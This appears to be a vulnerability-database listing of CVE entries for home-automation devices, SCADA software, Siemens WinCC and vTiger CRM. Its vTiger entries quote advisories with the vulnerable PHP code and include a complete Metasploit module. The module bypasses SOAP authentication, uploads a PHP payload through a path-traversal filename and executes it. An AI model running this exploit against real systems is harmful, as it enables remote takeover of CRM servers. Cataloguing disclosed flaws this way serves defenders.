CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
MiCasaVerde VeraLite with firmware 1.5.408 allows remote attackers to send HTTP requests to intranet servers via the url parameter to cgi-bin/cmh/proxy.sh, related to a Server-Side Request Forgery (SSRF) issue. MiCasaVerde VeraLite Contains a server-side request forgery vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Mi Casa Verde VeraLite is a home gateway controller device from Mi Casa Verde, Hong Kong, China. The device can control the home appliances connected to the home Wi-Fi network through a computer or mobile phone. There is a security bypass vulnerability in Mi Casa Verde VeraLite. An attacker can exploit a vulnerability to bypass specific security restrictions and perform unauthorized operations
| VAR-201912-1592 | CVE-2013-4859 |
INSTEON Hub Inadequate default permissions vulnerability
Related entries in the VARIoT exploits database: VAR-E-201308-0216 |
CVSS V2: 9.3 CVSS V3: 8.1 Severity: HIGH |
INSTEON Hub 2242-222 lacks Web and API authentication. INSTEON Hub contains an improper default permissions vulnerability. Information may be disclosed or tampered with, and a denial of service (DoS) may result. The INSTEON Hub lets users control automated devices in the home over the network. INSTEON Hub does not properly validate web interface access or API calls, allowing remote attackers to control devices without authorization and perform various operations. INSTEON Hub is prone to multiple security-bypass vulnerabilities.
An attacker may exploit these issues to bypass certain security restrictions and perform unauthorized actions.
INSTEON Hub 2242-222 is vulnerable; other versions may also be affected.
| VAR-201309-0480 | No CVE | ClearSCADA Web Request Handling Remote Denial of Service Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
ClearSCADA is an integrated SCADA host platform that includes a rotation training engine, real-time database, web server, alarm processor and reporting software. ClearSCADA mishandles a web request, which allows a remote attacker to submit a malicious request, trigger an exception, and crash the application. ClearSCADA is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to trigger an exception and cause a denial-of-service condition.
| VAR-201308-0165 | CVE-2013-2790 | IOServer master-station DNP3 driver denial of service (DoS) vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The master-station DNP3 driver before driver19.exe, and Beta2041.exe, in IOServer allows remote attackers to cause a denial of service (infinite loop) via crafted DNP3 packets to TCP port 20000. IOServer is a Windows-based OPC server that allows OPC clients such as human-machine interfaces and supervisory control and data acquisition systems to exchange plant data with programmable logic controllers. The IOServer driver does not verify, or does not correctly verify, the input received by the master station on port 20000/TCP, which can affect the control flow or data flow of the program. An attacker who can submit a specially crafted request can make IOServer enter an infinite loop from which it does not exit; a manual restart is then required to restore normal operation. Multiple IOServer drivers are prone to a remote denial-of-service vulnerability. This will result in a denial-of-service condition.
| VAR-201404-0102 | CVE-2013-3213 | Vtiger CRM SQL Injection Vulnerability |
Related entries in the VARIoT exploits database: VAR-E-201308-0074 |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Multiple SQL injection vulnerabilities in vTiger CRM 5.0.0 through 5.4.0 allow remote attackers to execute arbitrary SQL commands via the (1) picklist_name parameter in the get_picklists method to soap/customerportal.php, (2) where parameter in the get_tickets_list method to soap/customerportal.php, or (3) emailaddress parameter in the SearchContactsByEmail method to soap/vtigerolservice.php; or remote authenticated users to execute arbitrary SQL commands via the (4) emailaddress parameter in the SearchContactsByEmail method to soap/thunderbirdplugin.php. Vtiger CRM contains SQL injection vulnerabilities. Any third party may execute SQL commands via the parameters listed above, including (4) the emailaddress parameter of the SearchContactsByEmail method in soap/thunderbirdplugin.php. vtiger CRM is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
vtiger CRM versions 5.0.0 through 5.4.0 are vulnerable. Vtiger CRM is a customer relationship management (CRM) system based on SugarCRM, developed by the American company Vtiger. The system provides functions such as management, collection, and analysis of customer information. The vulnerabilities arise because the soap/customerportal.php script does not correctly filter the 'picklist_name' parameter in the get_picklists method or the 'where' parameter in the get_tickets_list method; the soap/vtigerolservice.php script does not correctly filter the 'emailaddress' parameter in the SearchContactsByEmail method; and the soap/thunderbirdplugin.php script does not correctly filter the 'emailaddress' parameter in the SearchContactsByEmail method.
[-] Vulnerability Description:
1) The vulnerable code is located in the get_picklists SOAP method defined in /soap/customerportal.php:
1177. $id = $input_array['id'];
1178. $sessionid = $input_array['sessionid'];
1179. $picklist_name = $adb->sql_escape_string($input_array['picklist_name']);
1180.
1181. if(!validateSession($id,$sessionid))
1182. return null;
1183.
1184. $picklist_array = Array();
1185.
1186. $admin_role = 'H2';
1187. $userid = getPortalUserid();
1188. $roleres = $adb->pquery("SELECT roleid from vtiger_user2role where userid = ?", array($userid));
1189. $RowCount = $adb->num_rows($roleres);
1190. if($RowCount > 0){
1191. $admin_role = $adb->query_result($roleres,0,'roleid');
1192. }
1193.
1194. $res = $adb->pquery("select vtiger_". $picklist_name.".* from vtiger_". $picklist_name." inner join [...]
User input passed through the "picklist_name" parameter seems to be correctly sanitised by the
sql_escape_string() method, but the vulnerability exists because it's used in the query at line 1194
without single or double quotes. This can be exploited to conduct blind SQL injection attacks.
2) The vulnerable code is located in the get_tickets_list SOAP method defined in /soap/customerportal.php:
654. $id = $input_array['id'];
655. $only_mine = $input_array['onlymine'];
656. $where = $input_array['where']; //addslashes is already added with where condition fields in portal itself
657. $match = $input_array['match'];
658. $sessionid = $input_array['sessionid'];
659.
660. if(!validateSession($id,$sessionid))
661. return null;
662.
663. // Prepare where conditions based on search query
664. $join_type = '';
665. $where_conditions = '';
666. if(trim($where) != '') {
667. if($match == 'all' || $match == '') {
668. $join_type = " AND ";
669. } elseif($match == 'any') {
670. $join_type = " OR ";
671. }
672. $where = explode("&&&",$where);
673. $where_conditions = implode($join_type, $where);
[...]
707. $query = "SELECT vtiger_troubletickets.*, vtiger_crmentity.smownerid,vtiger_crmentity.createdtime, [...]
708. FROM vtiger_troubletickets
709. INNER JOIN vtiger_crmentity ON vtiger_crmentity.crmid = vtiger_troubletickets.ticketid AND [...]
710. WHERE vtiger_troubletickets.parent_id IN (". generateQuestionMarks($entity_ids_list) .")";
711. // Add conditions if there are any search parameters
712. if ($join_type != '' && $where_conditions != '') {
713. $query .= " AND (".$where_conditions.")";
714. }
User input passed through the "where" parameter isn't properly validated before being
used in a SQL query at line 713. This can be exploited to conduct SQL injection attacks.
3) The vulnerable code is located in the SearchContactsByEmail SOAP method defined in /soap/thunderbirdplugin.php:
186. function SearchContactsByEmail($username,$password,$emailaddress)
187. {
188. if(authentication($username,$password))
189. {
190. require_once('modules/Contacts/Contacts.php');
191.
192. $seed_contact = new Contacts();
193. $output_list = Array();
194.
195. $response = $seed_contact->get_searchbyemailid($username,$emailaddress);
User input passed through the "emailaddress" parameter isn't properly validated before being used
in a call to the Contacts::get_searchbyemailid() method at line 195. This can be exploited to conduct
SQL injection attacks. Successful exploitation of this vulnerability requires authentication.
4) The vulnerable code is located in the SearchContactsByEmail SOAP method defined in /soap/vtigerolservice.php:
282. function SearchContactsByEmail($username,$session,$emailaddress)
283. {
284. if(!validateSession($username,$session))
285. return null;
286. require_once('modules/Contacts/Contacts.php');
287.
288. $seed_contact = new Contacts();
289. $output_list = Array();
290.
291. $response = $seed_contact->get_searchbyemailid($username,$emailaddress);
User input passed through the "emailaddress" parameter isn't properly validated before being used in
a call to the Contacts::get_searchbyemailid() method at line 291. This can be exploited to conduct SQL
injection attacks. Successful exploitation of this vulnerability requires knowledge of a valid username.
[-] Solution:
Apply the vendor patch: http://www.vtiger.com/blogs/?p=1467
[-] Disclosure Timeline:
[13/01/2013] - Vendor notified
[06/02/2013] - Vendor asked feedback about http://trac.vtiger.com/cgi-bin/trac.cgi/changeset/13848
[05/03/2013] - Feedback provided to the vendor
[26/03/2013] - Vendor patch released
[18/04/2013] - CVE number requested
[20/04/2013] - CVE number assigned
[01/08/2013] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2013-3213 to these vulnerabilities.
[-] Credits:
Vulnerabilities discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2013-06
| VAR-202001-0886 | CVE-2013-3214 | vtiger CRM Injection Vulnerability |
Related entries in the VARIoT exploits database: VAR-E-201308-0074, VAR-E-201308-0073 |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
vtiger CRM 5.4.0 and earlier contain a PHP Code Injection Vulnerability in 'vtigerolservice.php'. vtiger CRM contains an injection vulnerability. Information may be disclosed or tampered with, and a denial of service (DoS) may result.
An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
vtiger CRM 5.4.0 and prior are vulnerable. Vtiger CRM is a customer relationship management (CRM) system based on SugarCRM, developed by the American company Vtiger. The system provides functions such as management, collection, and analysis of customer information.
[-] Vulnerability Description:
The vulnerable code is located in the AddEmailAttachment SOAP method defined in /soap/vtigerolservice.php:
458. function AddEmailAttachment($emailid,$filedata,$filename,$filesize,$filetype,$username,$session)
459. {
460. if(!validateSession($username,$session))
461. return null;
462. global $adb;
463. require_once('modules/Users/Users.php');
464. require_once('include/utils/utils.php');
465. $filename = preg_replace('/\s+/', '_', $filename);//replace space with _ in filename
466. $date_var = date('Y-m-d H:i:s');
467.
468. $seed_user = new Users();
469. $user_id = $seed_user->retrieve_user_id($username);
470.
471. $crmid = $adb->getUniqueID("vtiger_crmentity");
472.
473. $upload_file_path = decideFilePath();
474.
475. $handle = fopen($upload_file_path.$crmid."_".$filename,"wb");
476. fwrite($handle,base64_decode($filedata),$filesize);
477. fclose($handle);
The vulnerability exists because this method fails to properly validate input passed through the "filedata" and
"filename" parameters, which are used to write an "email attachment" in the storage directory (lines 475-477).
[-] Solution:
The patch provided by the vendor (http://www.vtiger.com/blogs/?p=1467) does not completely fix this
vulnerability, because a remote authenticated user can still inject and execute arbitrary code.
[*] The vendor was alerted about this when the feedback was provided.
[-] Disclosure Timeline:
[13/01/2013] - Vendor notified
[06/02/2013] - Vendor asked feedback about http://trac.vtiger.com/cgi-bin/trac.cgi/changeset/13848
[05/03/2013] - Feedback provided to the vendor [*]
[26/03/2013] - Vendor patch released
[18/04/2013] - CVE number requested
[20/04/2013] - CVE number assigned
[01/08/2013] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2013-3214 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2013-07
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rexml/document'
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include REXML
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload',
      'Description' => %q{
        vTiger CRM allows a user to bypass authentication when requesting SOAP services.
        In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP
        service. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu
        10.04 and Windows 2003 SP2.
      },
      'Author' =>
        [
          'Egidio Romano', # Vulnerability discovery
          'juan vazquez' # msf module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2013-3214' ],
          [ 'CVE', '2013-3215' ],
          [ 'OSVDB', '95902' ],
          [ 'OSVDB', '95903' ],
          [ 'BID', '61558' ],
          [ 'BID', '61559' ],
          [ 'EDB', '27279' ],
          [ 'URL', 'http://karmainsecurity.com/KIS-2013-07' ],
          [ 'URL', 'http://karmainsecurity.com/KIS-2013-08' ]
        ],
      'Privileged' => false,
      'Platform' => ['php'],
      'Arch' => ARCH_PHP,
      'Payload' =>
        {
          # Arbitrary big number. The payload is sent base64 encoded
          # into a POST SOAP request
          'Space' => 262144, # 256k
          'DisableNops' => true
        },
      'Targets' =>
        [
          [ 'vTigerCRM v5.4.0', { } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Mar 26 2013'))
    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base vTiger CRM directory path", '/vtigercrm/'])
      ], self.class)
  end
  # Vulnerability check: CheckEmailPermission with a random session must return nil,
  # while the same call with an empty session must be answered (authentication bypass).
  def check
    test_one = check_email_soap("admin", rand_text_alpha(4 + rand(4)))
    res = send_soap_request(test_one)
    unless res and res.code == 200 and res.body.to_s =~ /<return xsi:nil="true" xsi:type="xsd:string"\/>/
      return Exploit::CheckCode::Unknown
    end
    test_two = check_email_soap("admin")
    res = send_soap_request(test_two)
    if res and res.code == 200 and (res.body.blank? or res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/)
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end
  def exploit
    file_name = rand_text_alpha(rand(10)+6) + '.php'
    php = %Q|<?php #{payload.encoded} ?>|
    soap = add_attachment_soap(file_name, php)
    res = send_soap_request(soap)
    print_status("#{peer} - Uploading payload...")
    if res and res.code == 200 and res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/
      print_good("#{peer} - Payload successfully uploaded")
      register_files_for_cleanup(file_name)
    else
      fail_with(Failure::Unknown, "#{peer} - Upload failed")
    end
    print_status("#{peer} - Executing payload...")
    send_request_cgi({'uri' => normalize_uri(target_uri.path, 'soap', file_name)}, 0)
  end
  # Builds the SOAP envelope for the AddEmailAttachment method (KIS-2013-07).
  def add_attachment_soap(file_name, file_data)
    xml = Document.new
    xml.add_element(
      "soapenv:Envelope",
      {
        'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance",
        'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema",
        'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
        'xmlns:crm' => "http://www.vtiger.com/products/crm"
      })
    xml.root.add_element("soapenv:Header")
    xml.root.add_element("soapenv:Body")
    body = xml.root.elements[2]
    body.add_element(
      "crm:AddEmailAttachment",
      {
        'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
      })
    crm = body.elements[1]
    crm.add_element("emailid", {'xsi:type' => 'xsd:string'})
    crm.add_element("filedata", {'xsi:type' => 'xsd:string'})
    crm.add_element("filename", {'xsi:type' => 'xsd:string'})
    crm.add_element("filesize", {'xsi:type' => 'xsd:string'})
    crm.add_element("filetype", {'xsi:type' => 'xsd:string'})
    crm.add_element("username", {'xsi:type' => 'xsd:string'})
    crm.add_element("session", {'xsi:type' => 'xsd:string'})
    crm.elements['emailid'].text = rand_text_alpha(4+rand(4))
    crm.elements['filedata'].text = "MSF_PAYLOAD"
    crm.elements['filename'].text = "MSF_FILENAME"
    crm.elements['filesize'].text = file_data.length.to_s
    crm.elements['filetype'].text = "php"
    crm.elements['username'].text = rand_text_alpha(4+rand(4))
    xml_string = xml.to_s
    xml_string.gsub!(/MSF_PAYLOAD/, Rex::Text.encode_base64(file_data))
    xml_string.gsub!(/MSF_FILENAME/, "../../../../../../#{file_name}")
    return xml_string
  end
  # Builds the SOAP envelope for the CheckEmailPermission method used by check().
  def check_email_soap(user_name = "", session = "")
    xml = Document.new
    xml.add_element(
      "soapenv:Envelope",
      {
        'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance",
        'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema",
        'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
        'xmlns:crm' => "http://www.vtiger.com/products/crm"
      })
    xml.root.add_element("soapenv:Header")
    xml.root.add_element("soapenv:Body")
    body = xml.root.elements[2]
    body.add_element(
      "crm:CheckEmailPermission",
      {
        'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
      })
    crm = body.elements[1]
    crm.add_element("username", {'xsi:type' => 'xsd:string'})
    crm.add_element("session", {'xsi:type' => 'xsd:string'})
    crm.elements['username'].text = user_name
    crm.elements['session'].text = session
    xml.to_s
  end
  def send_soap_request(soap_data)
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'soap', 'vtigerolservice.php'),
      'method' => 'POST',
      'ctype' => 'text/xml; charset=UTF-8',
      'data' => soap_data
    })
    return res
  end
end
| VAR-201406-0070 | CVE-2013-4860 | Radio Thermostat CT80 and CT50 Remote Security Bypass Vulnerability |
CVSS V2: 8.3 CVSS V3: - Severity: HIGH |
Radio Thermostat CT80 and CT50 with firmware 1.4.64 and earlier do not restrict access to the API, which allows remote attackers to change the operation mode, wifi connection settings, temperature thresholds, and other settings via unspecified vectors. The Radio Thermostat CT80 and CT50 are WiFi-controlled thermostats.
An attacker may leverage this issue to bypass certain security restrictions and perform unauthorized actions.
Radio Thermostat CT80 and CT50 running versions 1.4.64 and prior are vulnerable. This product manages heating and cooling systems in homes.
| VAR-201308-0266 | CVE-2013-4911 | Siemens SIMATIC WinCC TIA Portal Cross-Site Request Forgery Vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Cross-site request forgery (CSRF) vulnerability in Siemens WinCC (TIA Portal) 11 and 12 before 12 SP1 allows remote attackers to hijack the authentication of unspecified victims by leveraging improper configuration of SIMATIC HMI panels by the WinCC product. Based on the Windows platform, Siemens SIMATIC WinCC provides complete supervisory control and data acquisition (SCADA) functionality for industry, from single-user systems to multi-user systems supporting redundant servers and remote web client solutions. Siemens SIMATIC WinCC TIA Portal is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
Siemens SIMATIC WinCC TIA Portal versions prior to 12 SP1 are vulnerable. The software enables fast and intuitive development and commissioning of automation systems. A remote attacker can exploit this vulnerability to hijack user authentication through incorrectly configured SIMATIC HMI panels of WinCC products.
| VAR-201308-0267 | CVE-2013-4912 | Siemens SIMATIC WinCC TIA Portal URL Redirection Vulnerability |
CVSS V2: 5.8 CVSS V3: - Severity: MEDIUM |
Open redirect vulnerability in Siemens WinCC (TIA Portal) 11 and 12 before 12 SP1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks by leveraging improper configuration of SIMATIC HMI panels by the WinCC product. Based on the Windows platform, Siemens SIMATIC WinCC provides complete supervisory control and data acquisition (SCADA) functionality for industry, from single-user systems to multi-user systems supporting redundant servers and remote web client solutions. Siemens SIMATIC WinCC TIA Portal is prone to a remote URL-redirection vulnerability.
An attacker can leverage this issue by constructing a URI that includes a malicious site redirection. When an unsuspecting victim follows the URI, they may be redirected to an attacker-controlled site; this may aid in phishing attacks.
Siemens SIMATIC WinCC TIA Portal versions prior to 12 SP1 are vulnerable. The software enables fast and intuitive development and commissioning of automation systems.
| VAR-201308-0006 | CVE-2012-3913 | Cisco VC220 and VC240 camera denial of service (DoS) vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The Cisco VC220 and VC240 cameras allow remote attackers to cause a denial of service (WebUI outage) via crafted packets, aka Bug IDs CSCtf73188, CSCtf88059, CSCtf87951, CSCtf87908, and CSCtf88019. Cisco VC220 and VC240 cameras contain a vulnerability that can put them into a denial of service state (WebUI outage). The vendor has confirmed this vulnerability and tracks it as Bug IDs CSCtf73188, CSCtf88059, CSCtf87951, CSCtf87908, and CSCtf88019. A packet crafted by a third party may put the device into a denial of service state (WebUI outage). The Cisco VC220 and VC240 devices are network cameras. An unauthenticated remote attacker can send a specially crafted packet to the affected device, causing it to reload, making the camera's WebUI inaccessible and denying service to legitimate users.
These issues are being tracked by Cisco Bug IDs CSCtf73188, CSCtf88059, CSCtf87951, CSCtf87908, and CSCtf88019. A remote attacker can exploit this vulnerability to cause a denial of service (WebUI interruption).